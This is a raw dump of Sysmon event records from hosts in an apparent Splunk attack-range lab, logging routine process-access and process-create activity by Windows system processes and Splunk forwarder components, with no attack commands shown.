11:01:45.215{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218537Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1419-6216-A704-000000003902}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218536Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1419-6216-A704-000000003902}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218535Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-1419-6216-A704-000000003902}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000218534Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.058{4F8D34B0-1418-6216-A604-000000003902}1600956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218552Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:46.856{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7F5FE9AB5FFFA795C69E4D0B60959D5,SHA256=3C5CFE2618AF64A4F553A2D67518DC240E81AC1DB1709B0E61587882C40BAA50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:46.562{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=532361467A99293428B74138BC399874,SHA256=EE8F4CD281B3F6E06D4218E8C1F2E9B13DF3AEE4D0A8340B1DCC9AC2F896F4D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218551Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:46.262{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.677{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A22BACCB35DD6F1F15FAD0243C22CA49,SHA256=A6B56FC3BDD12EAFC8546D4D0391C2FBB1EDD9DE21A2E078C8DCBEECDC323585,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218578Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-141B-6216-A904-000000003902}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218577Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218576Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218575Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218574Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218573Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218572Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218571Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218570Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218569Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218568Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-141B-6216-A904-000000003902}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218567Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.903{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-141B-6216-A904-000000003902}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218566Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.904{4F8D34B0-141B-6216-A904-000000003902}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000218565Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.231{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-141B-6216-A804-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218564Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218563Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218562Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218561Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218560Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218559Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 